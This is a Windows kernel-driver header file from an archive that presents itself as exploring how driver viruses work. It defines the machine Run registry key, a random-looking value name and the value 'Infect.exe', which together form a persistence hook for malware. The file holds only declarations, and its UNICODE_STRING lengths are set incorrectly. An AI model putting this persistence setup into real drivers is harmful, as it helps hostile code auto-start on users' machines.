hello.h

2004-03-05_驱动病毒探索.rar探索驱动病毒的原理。

/*******************************************************************
Copyright (c) 2003 Green Asia Electronics.

Module Name:

    Hello.h 

Current Version : 
	v0.1

Abstract:
	Whole driver type, macro, constant definition, and some functions prototype.

Environment:

    kernel mode only

Notes:


	Copyright (c) 2003 Green Asia Electronics.  All Rights Reserved.


Revision History:

    Year  Month  Day   Author       Version         Comment
    2003   09     14   HenryShow     v0.1       	first version


*******************************************************************/

///////////////////////////////////////////////////////////////////////////////////
//	Original File Name : Hello.h
///////////////////////////////////////////////////////////////////////////////////

#ifndef __HELLO_H__
#define __HELLO_H__
///////////////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////////////
// Header files include				:		Begin
#include <wdm.h>
// Header files include				:		End
///////////////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////////////////////
// Constant Definition      		:     Begin
#define MAXIMUM_REGPATH_LENGTH		128
// Constant Definition      		:     End
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
// Global Variable Definition		:     Begin
WCHAR RegRunKeyName[MAXIMUM_REGPATH_LENGTH] = L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";

WCHAR RegKeyValueName[MAXIMUM_REGPATH_LENGTH] = L"adfjakdsfaskl";

WCHAR RegKeyValue[MAXIMUM_REGPATH_LENGTH] = L"Infect.exe";

UNICODE_STRING RegPath = { sizeof(RegRunKeyName) / sizeof(RegRunKeyName[0]), MAXIMUM_REGPATH_LENGTH, RegRunKeyName };
UNICODE_STRING ValueName = {sizeof(RegKeyValueName) / sizeof(RegKeyValueName[0]), MAXIMUM_REGPATH_LENGTH, RegKeyValueName };
UNICODE_STRING Value = {sizeof(RegKeyValue) / sizeof(RegKeyValue[0]), MAXIMUM_REGPATH_LENGTH, RegKeyValue };
// Global Variable Definition		:     End
///////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
// Struct Definition        		:     Begin

// Struct Definition        		:     End
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
// Macro Definition         		:     Begin

// Macro Definition         		:     End
///////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
// Function Prototype Definition	:     Begin
VOID 
DriverUnload(
	IN PDRIVER_OBJECT DriverObject
    );

// Function Prototype Definition	:     End
///////////////////////////////////////////////////////////////////////////////////

#endif // of #ifdef __HELLO_H__